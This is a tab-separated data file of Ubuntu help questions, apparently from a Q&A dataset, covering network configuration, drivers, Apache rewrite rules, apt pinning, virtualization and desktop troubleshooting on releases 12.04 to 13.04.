313877	how do i add an additional ip address to /etc/network/interfaces ?	i have an extra ip address available to my server , and so i need to assign it in the interfaces file . at the moment , i 've got this : auto lo iface lo inet loopback auto eth0 iface eth0 inet static address aaa.aaa.aaa.aaa netmask 255.255.254.0 gateway bbb.bbb.bbb.bbb dns-nameservers ccc.ccc.ccc.ccc ddd.ddd.ddd.ddd eee.eee.eee.eee dns-search vps-number.com what do i add to assign my new ip address ( fff.fff.fff.fff ) ? and how do i then restart it to accept the new configuration ?
313879	problem with qtcreator after update	i installed the ubuntu-sdk 2 days back on my machine ( 12.04 ) and the qt version that is installed is 5.0.2 . everything was working perfectly , but today there were some updates from the ubuntu-sdk-team , after installing which , qt creator does not show the ubuntu welcome page and there is no project type for ubuntu touch , it 's simply gone . the default currency converter app works , and i 've got a new project type called cordovaqt . the flip side to all of this is that , qt creator works with the ubuntu plugin and everything as before if it is run via terminal . why is this happening ? ideas ?
313882	app for finding icons easily ?	occasionally i need to use a custom icon for something - a launcher created with alacarte , a custom .desktop file , or just a particular folder viewed in nautilus . i know there are loads of cool icons installed on my system at /usr/share/icons but browsing them is really awkward . everything is scattered around , duplicated in different sizes ( or symlinked to .svg ) etc . so , say i 'm looking for a text file icon , or a purple folder or such , searching is a faff , and then when you do find results you need to work out what the best quality one is . made me think that someone might have written an app for this ?
313888	unknown filesystem type 'msdos '	i 'm trying to mount a disk image with freedos i have so i can move some old dos programs over to play through qemu as a test for a friend who has to use dos programs at her work . when i try to mount the image using mount , i get a unknown filesystem type 'msdos ' error . the manpage states that msdos is supported , but apparently it ca n't be used . i added it in my fstab . the line is /home/user/freedos.img /mnt/freedos msdos loop , offset=32256 0 0 is there something i need to get and install to support msdos fstypes or is ubuntu not supporting msdos period ?
313891	how to work for ubuntu ?	i am very much impressed by ubuntu . i want to work for it but i know only c language . can somebody guide me on how to work for ubuntu . thanks for your reply i do n't want to learn any other programming languages . programatically i want to contribute .
313896	how do i fix a `` /tmp is not ready or mounted '' error ?	i run ubuntu 12.04 lts on a lenovo ideapad netbook s10 . i been getting this error a lot , and then i did a fresh install . i had ubuntu only a month now , but the error had n't started till yesterday morning , then i did a fresh install . this morning i got the same error again . i opened the netbook and the motherboard , hard drive , and ssd drive are all properly connected . and did a smart test and my hdd is healthy . i noticed this only started up after i installed the program spotify . could this be the issue ? when i had it in windows vista it gave the other machine a bsod on launch . update : did another fresh install and no error on launches . ( never installed spotify . ) both machines experienced this error .
313900	issue with dynamic quicklist in unity	i would like to add a quicklist to gufw app , but it is n't working . the code is here ( you can install reading the install file ) : http : //bazaar.launchpad.net/~gufw-developers/gui-ufw/testing/files/3 i added lines 52-54 to the view ( a simple example ) from the official api web : http : //bazaar.launchpad.net/~gufw-developers/gui-ufw/testing/view/head : /gufw/view/gufw.py https : //wiki.ubuntu.com/unity/launcherapi self.launcher = unity.launcherentry.get_for_desktop_id ( `` gufw.desktop '' ) self.launcher.set_property ( `` progress '' , 0.42 ) self.launcher.set_property ( `` progress_visible '' , true ) but nothing happen . but if i run this file with gufw running : http : //bazaar.launchpad.net/~gufw-developers/gui-ufw/testing/view/head : /gufw/test_launcher.py $ python test_launcher.py the progress bar appears ! : / i do n't know what am i missing ? : p any idea ? thanks in advance ! the environment is ubuntu 13.04 .
313901	eclipse : ca n't import swt	the error says : `` the import org.eclipse can not be resolved . '' i 've been at this for the past 8 hours , tried just about everything : swap workspace project- > properties- > java build path windows- > preference- > java build path i 've reinstalled eclipse 3 times . ( twice using ubuntu software center , once , direct download from eclipse.org )
313902	how to get direct access to host network from virtualbox running ubuntu ?	i 'm running ubuntu on a virtual machine with virtualbox . the host uses windows 8 . right now , the guest has internet access , but it 's some sort of virtual network because it thinks it 's using a wired connection when i 'm using wireless . how do i get my virtualbox guest to get direct access to the network the host is using ?
313904	problem intalling ubuntu 13.04	when i try to install i do n't get the option to install alongside with windows but i only have the option of creating partition ! what should i do to install alongside with windows ? please help me !
313905	laptop overheating on ubuntu 12.04 [ solved ] ( in strange way )	i have dell inspiron q17r with two graphic cards and i noticed that it is overheating . i installed bumblebee , jupiter and flashblock , i followed this : http : //techhamlet.com/2012/05/ubuntu-how-to-fix-over-heating-of-laptops-with-switchable-graphics/ but it still got to even 74c . here i found something : github.com/bumblebee-project/bumblebee/wiki/troubleshooting power management relies on acpi , disabling acpi renders bbswitch unusable . be sure that your kernel boot parameters do not contain on of the options noacpi , pci=noacpi , acpi=off . and i changed it to pci=noacpi because without it did n't even started.. i followed : http : //goof848.wordpress.com/2011/12/20/how-to-setup-ubuntu-11-10-on-a-inspiron-17r-n7110/ but in point 4 . i instaled bumblebee instead . what should i do ? edit : so i changed pci=noacpi to pci=acpi and.. it 's working great : ) do n't know what are the consequences but the temperature is lower than on windows : )
313907	how to remove a particular ppa ?	i have added transmission ppa . after adding ppa , when i tried to open software updater i got the following messege . failed to load the package list this is a serious problem . try again later . if this problem appears again , please report an error to the developers . even i could'nt open software sources , ubuntu software center , and sypnatic package manager . what i have to do . is there any command to remove the ppa .
313910	installing ubuntu with usb stick	i tried to install ubuntu with an usb stick . i used unetbootin . everytime i tried it , there was an error : '' invalid or corrupt kernel '' i tried with several sticks . what could be the problem ? greetings from germany michael
313913	trouble with installation	im installing 12.04 on an old winxp laptop from the cd . when i tell it to boot from cd , it starts to , then it stalls on the screen with two little pictures at the bottom , a rectangle and a circle with a person ? star ? inside . does n't get to the screen where it says `` ubuntu '' with red lights under it . thanks in advance for the help .
313919	configuration issue with respect to .htaccess file on ubuntu	i am building an application tshirtshop i have following configuration in /etc/apache2/sites-enabled/tshirtshop < virtualhost *:80 > serveradmin webmaster @ localhost documentroot /var/www/tshirtshop < directory /var/www/tshirtshop > options indexes followsymlinks allowoverride all order allow , deny allow from all < /directory > errorlog $ { apache_log_dir } /error.log # possible values include : debug , info , notice , warn , error , crit , # alert , emerg . loglevel warn customlog $ { apache_log_dir } /access.log combined < /virtualhost > and following in .htaccess file in location /var/www/tshirtshop/.htaccess < ifmodule mod_rewrite.c > # enable mod_rewrite rewriteengine on # specify the folder in which the application resides . # use / if the application is in the root . rewritebase /tshirtshop # rewritebase / # rewrite to correct domain to avoid canonicalization problems # rewritecond % { http_host } ! ^www\.example\.com # rewriterule ^ ( . * ) $ http : //www.example.com/ $ 1 [ r=301 , l ] # rewrite urls ending in /index.php or /index.html to / rewritecond % { the_request } ^get\ .*/index\. ( php|html ? ) \ http rewriterule ^ ( .* ) index\. ( php|html ? ) $ $ 1 [ r=301 , l ] # rewrite category pages rewriterule ^.*-d ( [ 0-9 ] + ) / . *-c ( [ 0-9 ] + ) /page- ( [ 0-9 ] + ) / ? $ index.php ? departmentid= $ 1 & categoryid= $ 2 & page= $ 3 [ l ] rewriterule ^.*-d ( [ 0-9 ] + ) / . *-c ( [ 0-9 ] + ) / ? $ index.php ? departmentid= $ 1 & categoryid= $ 2 [ l ] # rewrite department pages rewriterule ^ . *-d ( [ 0-9 ] + ) /page- ( [ 0-9 ] + ) / ? $ index.php ? departmentid= $ 1 & page= $ 2 [ l ] rewriterule ^ . *-d ( [ 0-9 ] + ) / ? $ index.php ? departmentid= $ 1 [ l ] # rewrite subpages of the home page rewriterule ^page- ( [ 0-9 ] + ) / ? $ index.php ? page= $ 1 [ l ] # rewrite product details pages rewriterule ^ . *-p ( [ 0-9 ] + ) / ? $ index.php ? productid= $ 1 [ l ] < /ifmodule > the site is working on localhost and is working as if there is no .htaccess rule specified i.e . if i were to view a page as http : //localhost/tshirtshop/nature-d2 then i get a 404 error but if i view the same page as http : //localhost/tshirtshop/index.php ? departmentid=2 then i can view it . sudo apache2ctl -m loaded modules : core_module ( static ) log_config_module ( static ) logio_module ( static ) mpm_prefork_module ( static ) http_module ( static ) so_module ( static ) alias_module ( shared ) auth_basic_module ( shared ) authn_file_module ( shared ) authz_default_module ( shared ) authz_groupfile_module ( shared ) authz_host_module ( shared ) authz_user_module ( shared ) autoindex_module ( shared ) cgi_module ( shared ) deflate_module ( shared ) dir_module ( shared ) env_module ( shared ) mime_module ( shared ) negotiation_module ( shared ) php5_module ( shared ) reqtimeout_module ( shared ) rewrite_module ( shared ) setenvif_module ( shared ) status_module ( shared ) syntax ok what is the mistake if any one can point out in above configuration , or else i need to check any thing else ?
313920	errors with vagrant and ubuntu 12.10 with rvm	installed vagrant via sudo apt-get install vagrant , and every time i try to run some vagrant command , such as vagrant init precise32 http : //files.vagrantup.com/precise32.box i get the following error : /home/novito/.rvm/rubies/ruby-2.0.0-p195/lib/ruby/site_ruby/2.0.0/rubygems/core_ext/kernel_require.rb:45 : in `require ' : can not load such file -- log4r ( loaderror ) from /home/novito/.rvm/rubies/ruby-2.0.0-p195/lib/ruby/site_ruby/2.0.0/rubygems/core_ext/kernel_require.rb:45 : in `require' from /usr/bin/vagrant:2 : in ` < main > ' not sure why rvm gets involved here , but oh well , i hope you guys can guide me on how to solve this .
313925	lvm is not supported yet	i have been forced to re-installed 12.04 due to virtualbox/grub problems . and i selected the lvm option as i have read its better for virtual machines . ubuntu is installed and running fine but in gparted i get the following error : is this because gparted ca n't understand it , or is there something else i am missing ?
313929	rename music files so they alphabetically follow a playlist	i have a bunch of mp3s i 've organised into a playlist for a party . what i 'd like to be able to do is easily rename these files so that they start with the position in the playlist : 001.track.mp3 002.track.mp3 . . . then they can simply be played in alphabetical order . is this possible without just doing it manually ?
313938	skype crash immediatly after launch	when i 'm launch skype , it crashes immediatly . error : mathieu @ mathieu-desktop : ~ $ skype `menu_proxy_module_load ' : skype : undefined symbol : menu_proxy_module_load ( skype:10442 ) : gtk-warning ** : failed to load type module : ( null ) `menu_proxy_module_load ' : skype : undefined symbol : menu_proxy_module_load ( skype:10442 ) : gtk-warning ** : failed to load type module : ( null ) `menu_proxy_module_load ' : skype : undefined symbol : menu_proxy_module_load ( skype:10442 ) : gtk-warning ** : failed to load type module : ( null ) `menu_proxy_module_load ' : skype : undefined symbol : menu_proxy_module_load ( skype:10442 ) : gtk-warning ** : failed to load type module : ( null ) abandon ( core dumped ) mathieu @ mathieu-desktop : ~ $ can you help me ? thank .
313944	carelessly remove all files in ./local/share/applications in my home directory	i carelessly ran the command rm ~/.local/share/applications/* , then when i restarted , there is nothing showed , only a wallpaper , no unity dash . what should i do ?
313945	i upgraded from win 7 to ubuntu 12.04 and know my html codes dont work	hello i just started using ubuntu the other day i never used linux or anything else besides windows before . i started learning html on windows 7 before switching to ubuntu and know my html images are not working even after i made new images on ubuntu and put the correct path and made sure the images are .png . after all that the site does not load the new images and the coeds are just fine i put my html files on cloud storage before switching to ubuntu so its not the codes . also i am using mozilla fire fox .
313948	printers.conf saves password in plain text - encryption ?	is it possible to change the printers.conf so that the password is n't shown as plain text there ? we 're using a global printing solution where the domain users have to authenticate to print - if they save the password it will be saved as plain text .
313950	permissioned denied /users	trying to create a directory under /users as root but get permission denied . any idea why ? thx dean dean @ dean-lnx : ~ $ sudo mkdir -p /users/testing [ sudo ] password for dean : mkdir : can not create directory /users/testing : permission denied dean @ dean-lnx : ~ $ ls -al /users total 4 drwxr-xr-x 2 root root 0 jun 28 00:51 . drwxr-xr-x 27 root root 4096 jun 28 00:51 ..
313952	sound not working	i am new to ubuntu , but really enjoy it . i do have one issue with setting it up on my computer . it is a gobook xr-1 and everything works perfectly except there is no sound . i 've searched and tried everything that i can think of , even uninstalling ubuntu and trying windows to see if the speakers worked . i found out that it was n't the speakers or any hardware issues . i tried to download the realtek drivers , but still no success .
313958	no eclipse in open with menu	i want to open all the .java files with eclipse to edit instead of gedit . i tried the open with menu but eclipse is n't listed there . how to i get this done ? i 'm using ubuntu gnome 13.04 edition . i have not installed eclipse using apt-get but have downloaded eclipse as a part of adt-bundle ( tools for android development ) . i would like to a general method to select other program for running a file that is not listed in other applications as there is an option in windows for browse to any other program .
313960	ubuntu installation guide xps13 crash	i got my xps 13 in the ubuntu developer edition today and ran into problems with its installation program . going through the installation program , it gave me the option to `` create a dell recovery image '' which i selected . when everything was ready to be installed the program froze trying to write to the usb stick . i reboot the computer and walked again through the installation guide . it told me that i have to choose another name for the computer ( not the one i chose before ) . when again it tried to write everything to the disk , i got the following message ( translated from german ) : there has been an error with the installation of the packages : command ' [ debconf-apt-progress , ' '- ' , apt-get ' , '-y ' , 'install ' , 'wswiss ' âś . return non zero exit status 255 the following packages are damaged : the error could have been caused through an old installation program or because of an error with the above packages . putting enter , the installation program crashes . i am new to ubuntu and i do n't know how to proceed from here . could anybody give me pointers as to what to do next ? if the complete error message is needed , i can write this up . best christian
313962	routing example.com/page to example.com : [ port ]	i have a server with multiple services running , for example : subdomain.example.com:1234 subdomain.example.com:1235 subdomain.example.com/1236 accessing these directly will take me to the web gui for these services . i want to set the server up so that i can , for example , go to : subdomain.example.com/service and it will access the web gui at : subdomain.example.com:1234 what do i use to configure this ?
313971	how do i fix a wireless connection in lubuntu ?	i recently installed lubuntu in a dual-boot setup on my lenovo thinkpad x131e . everything works fine , except that wifi is extremely slow . i am unable to get a good connection even from a few feet away . i have had problems with the laptop forcing ipv6 on windows 8 and lubuntu , and had to disable ipv6 to fix it for both . the wireless works well in windows 8 , but is very slow in lubuntu , so i know it is a problem with lubuntu . i can not install the recommended proprietary driver because it does not work on the device ( i have tried ) . can anyone help me ? thanks . when i type lpsci -nnk | grep -a2 0280 the output is 02:00.0 network controller [ 0280 ] : broadcom corporation bcm4313 802.11b/g/n wireless lan controller [ 14e4:4727 ] ( rev 01 ) subsystem : broadcom corporation device [ 14e4:0608 ] kernel driver in use : bcma-pci-bridge
313973	what are the alternatives to notepad++ on ubuntu ?	i use notepad++ on windows 7 and i want to know if there is a good substitution for it on ubuntu . i want something that is good for editing html files .
313975	where is the banshee folder ?	i 'd like to take a look to the source code but i ca n't find the right folder . no the folder in the home directory , the one where the source and configuration is stored , a cd banshee isnât going to work , i obviously need the right path .
313980	best container/compressor for nesting	is there a format , such as 7zip , zip , tar.gz etc that that 'glues ' pre-compressed folders together quickly ? at the moment , it appears that archiving pre-compressed files/folders has very little benefit when compressing up the parent directory . i do n't care which format i use or compression rates , so much as ensuring that the end result is a single file .
313986	cron job bash script to restart desktop sharing ?	i 'm having trouble with desktop sharing crashing while during remote sessions . is there a way to set cron to check and restart , if necessary , the desktop sharing application with a bash script ?
313987	problem installing and uninstalling ubuntu	i bought a new pc and as i have windows on my laptop i thought i would give ubuntu a try . i downloaded the iso , burned the disk image and installed it , but i get nothing to work properly . as a result , i decided to uninstall it , but it seems that i cant do that neither : firefox gives error messages wi-fi drops every few minutes , it is hopeless the mags make it look like a better type of windows but it is beyond me . can any one help me either get it to work or remove it ? i am 65 if you can guide me slowly i will try .
313989	screen is flickering on max resolution	i got a new pc with an intel i7 4770 with no extra video card . so this pc uses the intel hd 4600 . my monitor is one from dell . it 's the u2711 . the max resolution of the monitor is 2560x1440 . to connect the pc to the monitor i am using a dual link dvi cable . thats for the setup . at first i cant get full resolution through the gui . the option 2560x1440 is not shown . but i found this script xrandr | grep maximum & sleep 2 gtf 2560 1440 60.0 & sleep 2 xrandr -- newmode `` 2560x1440_60.00 '' 311.83 2560 2744 3024 3488 1440 1441 1444 1490 -hsync +vsync & sleep 2 xrandr -- addmode hdmi1 2560x1440_60.00 & sleep 2 xrandr -- output hdmi1 -- mode 2560x1440_60.00 & exit 0 the script will change the resolution successfully . but after a while ( ~30 secs ) the monitor starts turning black and back on . its flickering . do you have any ideas ?
314000	setting up on a poweredge 2400	i just received an old dell poweredge 2400 . i have only been able to successfully install ubuntu server 8.10 on this system . but as this is no longer supported i was wanting to see if there are any supported versions i can run on this system . i have tried insatlling several other versions but the installs have been unsuccessful .
314001	how can i mount hard disk drives on ubuntu studio ?	how can i mount my internal hard drives on ubuntu studio 13.04 ? i am not able to see any option in it .
314005	why am i given the option to also encrypt my home folder after i 've selected system encryption ?	i am installing ubuntu 13 with full encryption but why am i given the option to also encrypt my home folder . surely the home folder is covered under the system encryption ? i 'm confused .
314009	how do i prevent apt-get from upgrading packages built from source ?	i have a package installed ( xcp-xapi ) which is prone to a bug . the fix is very simple ( only a couple of lines in the code ) so what i do is the following : apt-get source xcp-xapi then i find the source file to apply the fix and then i run again apt-get -b source xcp-xapi this will produce some .deb files that i install using dpkg -i *.deb now the problem is that every time i try to run an apt-get upgrade , apt tries to fetch the packages from the repositories . i guess this can be fixed using pinning , but i can not find the proper configuration to put in high priority the packages i compiled on my own . so the question is how can i configure pinning to put the following already installed packages on higher priority than any existing in the repositories ? # apt-cache policy xcp-networkd xcp-v6d xcp-xapi xcp-xapi-debug xcp-networkd : installed : 1.3.2-5ubuntu0.1 candidate : 1.3.2-5ubuntu0.1 version table : 1.3.2-5ubuntu0.1 0 500 http : //ftp.uninett.no/ubuntu/ precise-updates/universe amd64 packages 500 http : //security.ubuntu.com/ubuntu/ precise-security/universe amd64 packages *** 1.3.2-5ubuntu0.1 0 100 /var/lib/dpkg/status 1.3.2-5 0 500 http : //ftp.uninett.no/ubuntu/ precise/universe amd64 packages xcp-v6d : installed : 1.3.2-5ubuntu0.1 candidate : 1.3.2-5ubuntu0.1 version table : 1.3.2-5ubuntu0.1 0 500 http : //ftp.uninett.no/ubuntu/ precise-updates/universe amd64 packages 500 http : //security.ubuntu.com/ubuntu/ precise-security/universe amd64 packages *** 1.3.2-5ubuntu0.1 0 100 /var/lib/dpkg/status 1.3.2-5 0 500 http : //ftp.uninett.no/ubuntu/ precise/universe amd64 packages xcp-xapi : installed : 1.3.2-5ubuntu0.1 candidate : 1.3.2-5ubuntu0.1 version table : 1.3.2-5ubuntu0.1 0 500 http : //ftp.uninett.no/ubuntu/ precise-updates/universe amd64 packages 500 http : //security.ubuntu.com/ubuntu/ precise-security/universe amd64 packages *** 1.3.2-5ubuntu0.1 0 100 /var/lib/dpkg/status 1.3.2-5 0 500 http : //ftp.uninett.no/ubuntu/ precise/universe amd64 packages xcp-xapi-debug : installed : 1.3.2-5ubuntu0.1 candidate : 1.3.2-5ubuntu0.1 version table : 1.3.2-5ubuntu0.1 0 500 http : //ftp.uninett.no/ubuntu/ precise-updates/universe amd64 packages 500 http : //security.ubuntu.com/ubuntu/ precise-security/universe amd64 packages *** 1.3.2-5ubuntu0.1 0 100 /var/lib/dpkg/status 1.3.2-5 0 500 http : //ftp.uninett.no/ubuntu/ precise/universe amd64 packages
314012	after a reboot banshee cant find music files ( stored on d : partition with ntfs format )	i recently made the step towards ubuntu 13.04 and while using banshee as well as with rythmbox every time i restart my machine she cant find my music files . ( big â¨ ! '' in front of the songs ) i have to delete my library and import it again and its just fine again.. till i restart . i have my music stored onto a seperate partition with ntfs format . ( i put it there while using win7 ) any ideas ?
314018	how to access a folder as root ?	i want to open a folder in desktop as root and install .jar file in that folder . i have a `` .jar '' file in desktop that i need to open it as root user but i want to copy that file into a folder in desktop and then open it as root user . how can i access .jar file in that folder via terminal ? how can i do that ?
314025	why does the installation of ubuntu is taking 4 hours ?	i would like to know , how much time is required to install ubuntu ? this is because my computer takes 4 to 5 hours to install ubuntu 13.04 trough the usb . i have no problem to install windows 7 ( takes only 30 minutes ) . what is actually the problem ? because i am interested in using ubuntu rather than windows my computer specs : intel dual core 1.7ghz 2gb ram , 60gbhdd
314036	693mb listing of ubuntu 12.04 downloas to 726mb ?	i just downloaded ubuntu 12.04 for mac , the download said 693mb . great , that will fit on a cd . downloaded it , and it is 726mb ? what ? i have a macbook a1181 with no os , and only cds to work with . what is going on here ? can i actually burn this to a cd ? is this a misprint or something on the website ? download link here http : //cdimage.ubuntu.com/releases/12.04/release/ubuntu-12.04.2-desktop-amd64+mac.iso
314043	how to get sound on macbook pro 4,1	i have just installed xubuntu 12.04.2 . my soundcard is detected : thomas @ thomas-pc : ~ $ sudo aplay -l **** list of playback hardware devices **** home directory /home/thomas not ours . card 0 : intel [ hda intel ] , device 0 : alc889a analog [ alc889a analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : intel [ hda intel ] , device 1 : alc889a digital [ alc889a digital ] subdevices : 1/1 subdevice # 0 : subdevice # 0 everything is put to max in alsamixer and nothing is muted ( all the sliders are on oo . my speakers do not work , but when i plug in a headphone i hear it very soft . when i connect my stereo and put the sound very loud ( 3-blocks-of-complaining-neighbours loud ) i hear it on a normal level but crackling . i added options snd-hda-intel model=mbp5 amixer set iec958 off to at the end of /etc/modprobe.d/alsa-base.conf . when it 's still not working i tried everything here : https : //help.ubuntu.com/community/soundtroubleshooting 1 > > > list-sinks 1 sink ( s ) available . * index : 0 name : < alsa_output.pci-0000_00_1b.0.analog-stereo > driver : < module-alsa-card.c > flags : hardware hw_mute_ctrl hw_volume_ctrl decibel_volume latency dynamic_latency state : suspended suspend cause : idle priority : 9959 volume : 0 : 100 % 1 : 100 % 0 : 0.00 db 1 : 0.00 db balance 0.00 base volume : 100 % 0.00 db volume steps : 65537 muted : no current latency : 0.00 ms max request : 0 kib max rewind : 0 kib monitor source : 0 sample spec : s16le 2ch 44100hz channel map : front-left , front-right stereo used by : 0 linked by : 0 configured latency : 0.00 ms ; range is 0.50 .. 371.52 ms card : 0 < alsa_card.pci-0000_00_1b.0 > module : 4 properties : alsa.resolution_bits = `` 16 '' device.api = `` alsa '' device.class = `` sound '' alsa.class = `` generic '' alsa.subclass = `` generic-mix '' alsa.name = `` alc889a analog '' alsa.id = `` alc889a analog '' alsa.subdevice = `` 0 '' alsa.subdevice_name = `` subdevice # 0 '' alsa.device = `` 0 '' alsa.card = `` 0 '' alsa.card_name = `` hda intel '' alsa.long_card_name = `` hda intel at 0x9b500000 irq 46 '' alsa.driver_name = `` snd_hda_intel '' device.bus_path = `` pci-0000:00:1b.0 '' sysfs.path = `` /devices/pci0000:00/0000:00:1b.0/sound/card0 '' device.bus = `` pci '' device.vendor.id = `` 8086 '' device.vendor.name = `` intel corporation '' device.product.name = `` 82801h ( ich8 family ) hd audio controller '' device.form_factor = `` internal '' device.string = `` front:0 '' device.buffering.buffer_size = `` 65536 '' device.buffering.fragment_size = `` 32768 '' device.access_mode = `` mmap+timer '' device.profile.name = `` analog-stereo '' device.profile.description = `` analog stereo '' device.description = `` built-in audio analog stereo '' alsa.mixer_name = `` realtek alc889a '' alsa.components = `` hda:10ec0885,106b3a00,00100103 '' module-udev-detect.discovered = `` 1 '' device.icon_name = `` audio-card-pci '' ports : analog-output-speaker : speakers ( priority 10000 , available : unknown ) properties : analog-output-headphones : headphones ( priority 9000 , available : no ) properties : active port : < analog-output-speaker > 2 and 3 : does n't seem an permission issue , the sound is very far away ( see opening paragraph ) . 4 thomas @ thomas-pc : ~ $ sudo aplay -l **** list of playback hardware devices **** home directory /home/thomas not ours . card 0 : intel [ hda intel ] , device 0 : alc889a analog [ alc889a analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : intel [ hda intel ] , device 1 : alc889a digital [ alc889a digital ] subdevices : 1/1 subdevice # 0 : subdevice # 0 5 thomas @ thomas-pc : ~ $ find /lib/modules/`uname -r` | grep snd /lib/modules/3.2.0-48-generic/kernel/sound/core/snd-hwdep.ko /lib/modules/3.2.0-48-generic/kernel/sound/core/snd-pcm.ko [ .. huge lists continues .. ] /lib/modules/3.2.0-48-generic/kernel/sound/pcmcia/pdaudiocf/snd-pdaudiocf.ko /lib/modules/3.2.0-48-generic/kernel/sound/pcmcia/vx/snd-vxpocket.ko thomas @ thomas-pc : ~ $ 6 thomas @ thomas-pc : ~ $ lspci -v | grep -a7 -i `` audio '' 00:1b.0 audio device : intel corporation 82801h ( ich8 family ) hd audio controller ( rev 03 ) subsystem : apple inc. device 00a4 flags : bus master , fast devsel , latency 0 , irq 46 memory at 9b500000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : snd_hda_intel kernel modules : snd-hda-intel 7 i guess it 's supported . linux mint and xubuntu 13.04 had no trouble with sounds . everything worked out of the box thanks in advance edit : alsa-info.sh output : warning : /etc/modprobe.d/alsa-base.conf line 45 : ignoring bad line starting with 'amixer' alsa information script v 0.4.62 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- this script visits the following commands/files to collect diagnostic information about your alsa installation and sound related hardware . dmesg lspci lsmod aplay amixer alsactl /proc/asound/ /sys/class/sound/ ~/.asoundrc ( etc . ) see './alsa-info.sh -- help ' for command line options . warning : /etc/modprobe.d/alsa-base.conf line 45 : ignoring bad line starting with 'amixer' automatically upload alsa information to www.alsa-project.org ? [ y/n ] : y uploading information to www.alsa-project.org ... done ! your alsa information is located at http : //www.alsa-project.org/db/ ? f=6cffc584284d4c0b266eb53249824ef83d6c4e3e please inform the person helping you . thomas @ thomas-pc : ~ $
314052	screen problems	i struggled a lot in order to install ubuntu because of a problem with the video drivers caused by when installing the driver and after turning it on it just appears a black screen , which worked for me was to use the terminal with sudo setpci -s 00:02.0 f4.b=0 and the screen starts , but after rebooting the changes wo n't remain and i have to run that command again . my question is : how can i make the changes permanent and not to be in need to execute that command always when i shut it down ? original question in spanish : problemas con pantalla he batallado mucho al instalar ubuntu por el problema con el controlador de video ya que al instalarlo al encenderla aparece solo una pantalla negra lo que me funciono fue usar desde consola sudo setpci -s 00:02.0 f4.b=0 enciende la pantalla pero al reiniciarla los cambios no se quedan guardados y tengo que volver a ejecutar ese comando mi pregunta es 多como hacerle para que los cambios queden igual y no tener que estar ejecutando eso siempre que la apago ?
314054	connect playstation console via vpn to the internet please help	i have a vpn connection to the internet with my pc and want to connect my playstation 3 to the internet . i have ubuntu 12.04 on my pc . how do i do that ? can i use internet connection sharing ? i only have one lan spot in my pc . do i need to buy another one ? does ics work with vpn ? are there other options . i can only use vpn to connect to the internet .
314055	networking with android 4.2	i am running ubuntu 13.04 i have a folder movies that i have shared by using the right click option . when i go to my tv which is running tronsmart rk3188 andriod 4.2 i see my pc and the folder which i have shared but when i try access it even after logging in i am refused access . any ideas , thanks
314059	installing ubuntu onto the same hd	i have xp pro on c drive and there is plenty of room left on said drive . i read to use `` windows installer for ubuntu desktop '' . it seems to create to partition but does it also install ubuntu at the same time ? i can put ubuntu 12.04 64 bit onto my usb drive . is making the partition with windows installer a two part operation ? first make the partition then go and do the install of linux .
314060	overheating on ubuntu 12.04	i have dell inspiron q17r with two graphic cards and i noticed that it is overheating . i installed bumblebee , jupiter and flashblock , i followed this : http : //techhamlet.com/2012/05/ubuntu-how-to-fix-over-heating-of-laptops-with-switchable-graphics/ and right now my laptop temperature is 64c . is there anything more i can do ? because it still does n't reallly seem to be working well . fan is going really fast..
314061	export or save custom autoformats ( format- > autoformat ... ) in libreoffice calc	how can i export or save my custom autoformat templates those i have created in libreoffice calc ? full path : libreoffice calc menu- > format- > autoformat ... is there any extension or any files to take a backup ?
314067	how to upgrade from 9.10 to 12.04 lts ( or newer ) ?	the weird thing is that my old hp laptop does n't want to install newer ubuntu using a cd . he just ignores it when booting up while a ubuntu 9.10 disk really gets me to installing and live disk . but is it possible to upgrade using a command or something ? because the inbuilt update manager says that karmic koala is not supported anymore . thanks in advance !
314070	config ca n't find libgtk2	i tried installing pcsxr from codeplex , since the software center version wo n't work for me . when i used the ./configure command , it eventually showed an error when searching for gtk2 : checking for gtk2 ... no configure : error : *** libgtk2 not found ! but when i looked in the synaptic package manager , it showed i did have the libgtk2 files . what could be wrong here ?
314076	run virtualbox at boot without a desktop enviroment	i am wondering if there is a way to run virtualbox xp machine on a ubuntu base system with no/very minimal ubuntu desktop environment . i want to use ubuntu for as the base operation system for such things as samba , dns , lamp . but some of the the applications we have developed and use are windows only . and require a bit more `` juice '' than ubuntu but we also need the windows gui to make changes , etc . i would like this on one machine , rather than a two .
314078	saving ubuntu settings to load into a new machine	i will soon be receiving a new machine ( yes , i need the improved performance ! ) how can i transfer over all of my current ubuntu settings and files to the new machine . this is very important because i have many packages installed from apt-get , python packages , emacs packages and so forth . i really want to avoid installing all of the same packages over again . i am currently running ubuntu 12.04 lts . what is the best solution in transferring my current ubuntu settings and files to a new machine ? let me know if you need more information . all help is greatly appreciated !
314079	13.04 - extenal monitor plugged on laptop hdmi shows image but lags a lot	it uses an nvidia geforce gts 250m . when i plug in the monitor , it shows some images but with bad fps and lagging a lot . for example , when i move the mouse pointer , it leaves a trail that vanishes from time to time . i did n't install nvidia drivers because every time i did this on past versions i ended up with an unbootable system . on past versions i just gave up trying to use the monitor cause it never showed anything regardless of what driver i installed . but since 13.04 almost made it , i 'll make another tries . ps . : works perfectly on windows 7/8
314085	my system boots to command line	version 12.04 graphics : nvidia gt750m and haswell integrated after the splash screen , a terminal comes up instead of x. i tried nomodeset but nothing changed .
314087	where is the guvcview configuration file ?	i had guvcview working once before . it suddenly quit working . this is the error i receive ... ... .. bt_audio_service_open : connect ( ) failed : connection refused ( 111 ) bt_audio_service_open : connect ( ) failed : connection refused ( 111 ) bt_audio_service_open : connect ( ) failed : connection refused ( 111 ) bt_audio_service_open : connect ( ) failed : connection refused ( 111 ) video device : /dev/video0 /dev/video0 - device 1 init . intergrated webcam ( location : usb-0000:00:1a.7-2 ) { pixelformat = 'yuyv ' , description = 'yuv 4:2:2 ( yuyv ) ' } { discrete : width = 640 , height = 480 } time interval between frame : 1/30 , 1/20 , 1/15 , 1/10 , 1/5 , { discrete : width = 352 , height = 288 } time interval between frame : 1/30 , 1/20 , 1/15 , 1/10 , 1/5 , { discrete : width = 320 , height = 240 } time interval between frame : 1/30 , 1/20 , 1/15 , 1/10 , 1/5 , { discrete : width = 176 , height = 144 } time interval between frame : 1/30 , 1/20 , 1/15 , 1/10 , 1/5 , { discrete : width = 160 , height = 120 } time interval between frame : 1/30 , 1/20 , 1/15 , 1/10 , 1/5 , { discrete : width = 1024 , height = 768 } time interval between frame : 1/9 , 1/5 , { discrete : width = 1280 , height = 1024 } time interval between frame : 1/9 , 1/5 , checking format : 1196444237 format unavailable : 1196444237 . init 